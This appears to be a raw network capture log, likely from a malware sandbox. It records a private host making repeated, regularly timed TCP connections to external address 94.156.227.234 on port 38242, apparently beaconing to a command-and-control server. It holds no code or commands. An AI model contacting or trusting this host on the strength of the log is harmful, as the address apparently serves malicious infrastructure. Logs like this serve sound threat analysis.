Dec 24, 2024 11:38:59.568959951 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:59.689822912 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:00.074820995 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:00.240175962 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:00.685868025 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:00.686127901 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:01.076389074 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:01.195866108 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:01.196103096 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:01.196103096 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:01.315989971 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:01.703583002 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:01.865586042 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:02.327565908 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:02.327703953 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:02.705935001 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:02.826041937 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:02.826152086 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:02.826263905 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:02.945749998 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:03.332616091 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:03.496256113 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:03.965662956 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:03.965800047 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:04.334774971 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:04.454340935 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:04.454530954 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:04.454699993 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:04.574255943 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:04.966928959 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:05.128385067 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:05.602303982 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:05.602524042 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:05.969185114 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:06.088736057 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:06.088943958 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:06.088943958 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:06.208453894 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:06.596820116 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:06.764256001 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:07.217535019 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:07.217736959 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:07.598737001 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:07.718494892 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:07.718758106 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:07.718759060 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:07.838318110 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:08.227171898 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:08.388319969 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:08.834770918 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:08.834963083 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:09.229334116 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:09.348882914 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:09.348998070 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:09.349046946 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:09.468566895 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:09.855262995 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:10.016788960 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:10.716361046 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:10.716716051 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:10.856913090 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:10.976372957 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:10.976588011 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:10.976588011 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:11.096167088 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:11.482470036 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:11.644332886 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:12.097007036 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:12.097173929 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:12.484273911 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:12.603761911 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:12.603924036 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:12.604032993 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:12.723426104 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:13.110061884 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:13.276294947 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:13.735604048 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:13.735805035 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:14.111160040 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:14.230690002 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:14.230783939 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:14.230967999 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:14.350465059 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:14.737771034 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:14.904414892 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:15.348798037 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:15.348949909 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:15.739423990 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:15.858918905 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:15.859035969 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:15.859141111 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:15.978725910 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:16.364540100 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:16.524425983 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:16.975116014 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:16.975415945 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:17.366378069 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:17.485894918 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:17.485985041 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:17.486179113 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:17.605638981 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:17.991873026 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:18.152379036 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:18.602850914 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:18.602972984 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:18.993721008 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:19.113213062 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:19.113322973 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:19.113568068 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:19.233041048 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:19.619045019 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:19.784508944 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:20.245049000 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:20.245290995 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:20.620603085 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:20.740101099 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:20.740315914 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:20.740315914 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:20.859885931 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:21.246639967 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:21.412472010 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:21.865150928 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:21.865500927 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:22.248239994 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:22.369043112 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:22.369441032 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:22.369441032 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:22.489047050 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:22.876044989 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:23.040517092 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:23.494230986 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:23.494401932 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:23.877743959 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:23.997421026 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:23.997649908 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:23.997649908 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:24.117172003 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:24.504220963 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:24.664554119 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:25.124639988 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:25.124984026 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:25.506167889 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:25.625617981 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:25.625890017 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:25.625956059 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:25.745424032 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:26.132469893 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:26.292546988 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:26.757989883 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:26.758208036 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:27.134104013 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:27.254154921 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:27.254297972 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:27.254337072 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:27.373871088 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:27.760961056 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:27.922399998 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:28.388931036 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:28.389339924 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:28.762742043 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:28.882297993 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:28.882553101 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:28.882778883 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:29.002227068 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:29.389461994 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:29.552627087 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:30.007261038 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:30.007699966 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:30.391383886 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:30.510886908 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:30.511254072 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:30.511254072 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:30.630825043 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:31.017945051 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:31.180610895 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:31.638478041 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:31.638878107 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:32.019721985 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:32.139698029 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:32.140161991 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:32.140161991 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:32.259696960 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:32.645636082 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:32.808717012 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:33.275713921 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:33.275859118 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:33.647034883 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:33.766539097 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:33.766809940 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:33.766809940 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:33.886816025 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:34.272392035 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:34.432806015 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:34.931355000 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:34.931520939 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:35.273916006 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:35.393456936 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:35.393601894 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:35.393601894 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:35.513389111 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:35.898927927 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:36.060781002 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:36.516669989 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:36.516946077 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:36.900444031 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:37.020183086 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:37.020312071 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:37.020522118 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:37.140067101 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:37.526277065 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:37.688790083 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:38.156661034 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:38.156963110 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:38.528486967 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:38.648022890 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:38.648278952 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:38.648278952 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:38.767971992 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:39.153465033 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:39.321002960 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:39.789349079 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:39.789653063 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:40.154917955 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:40.274482012 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:40.274789095 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:40.274789095 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:40.394539118 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:40.780667067 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:40.941397905 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:41.387012005 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:41.387268066 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:41.782479048 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:41.903429031 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:41.903542995 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:41.903726101 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:42.023159981 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:42.408243895 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:42.573045015 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:43.019618988 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:43.019877911 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:43.409418106 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:43.528913975 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:43.529134989 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:43.529134989 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:43.649019957 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:44.034634113 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:44.197133064 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:44.650080919 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:44.650221109 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:45.035952091 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:45.155479908 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:45.155751944 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:45.155916929 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:45.275384903 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:45.662791967 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:45.824896097 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:46.285070896 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:46.285322905 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:46.664578915 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:46.784178019 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:46.784375906 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:46.784375906 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:46.903975010 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:47.290169954 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:47.456986904 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:47.908818960 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:47.909058094 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:48.291743994 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:48.412053108 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:48.412229061 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:48.412317991 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:48.532691956 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:48.917073965 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:49.081065893 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:49.544322968 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:49.544471979 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:49.918567896 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:50.038191080 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:50.038357019 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:50.038439989 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:50.157979012 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:50.544791937 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:50.705249071 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:51.158798933 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:51.158968925 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:51.546241045 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:51.665874004 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:51.666183949 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:51.666237116 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:51.785861015 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:52.172846079 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:52.333132982 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:52.794485092 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:52.794673920 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:53.173949003 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:53.293572903 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:53.293716908 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:53.293716908 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:53.413851976 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:53.799376011 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:53.961082935 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:54.412336111 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:54.412623882 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:54.801139116 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:54.920829058 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:54.921207905 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:54.921207905 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:55.040940046 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:55.426983118 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:55.589397907 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:56.049671888 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:56.049923897 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:56.428524017 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:56.548115015 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:56.548394918 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:56.548394918 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:56.667999983 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:57.054666996 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:57.217271090 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:57.666390896 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:57.666695118 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:58.056317091 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:58.176228046 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:58.176398993 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:58.176553965 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:58.296139956 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:58.682816029 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:58.845190048 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:59.301376104 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:59.301677942 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:59.684372902 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:59.804110050 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 11:39:59.804264069 CET	60160	38242	192.168.2.23	94.156.227.234
